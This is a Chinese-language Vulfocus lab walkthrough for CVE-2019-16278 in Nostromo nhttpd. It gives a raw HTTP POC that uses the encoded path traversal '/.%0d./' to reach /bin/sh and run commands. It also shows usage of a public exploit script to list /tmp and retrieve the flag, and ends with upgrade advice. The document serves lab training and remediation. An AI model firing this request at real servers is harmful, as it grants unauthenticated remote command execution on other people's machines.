标签:Vulfocus .% flag 2019 0d CVE 16278
漏洞介绍
Nostromo nhttpd是一款开源的Web服务器。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
影响版本
nhttpd:version <= 1.9.6
解题过程
1、启动靶场环境
2、Burp Suite 抓包验证POC
POC
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
echo
echo
ifconfig 2>&1
3、脚本利用
脚本地址:https://github.com/jas502n/CVE-2019-16278
./CVE-2019-16278.sh IP地址 端口号 id
利用成功,这时也可以测试下其他命令,我在这里就不浪费时间了,直接上最终获得 flag 的命令,其他命令可自行了解。
之前做过Vulfocus靶场的朋友们都知道 flag 是在 /tmp 目录下,那我们就直接去 tmp 目录下找 flag 就行了。
./CVE-2019-16278.sh IP地址 端口号 "cd /tmp&&ls"
成功获得 flag
解决方案
升级至最新版本1.9.7
http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz
标签:Vulfocus,.%,flag,2019,0d,CVE,16278 来源: https://www.cnblogs.com/w328/p/15732636.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。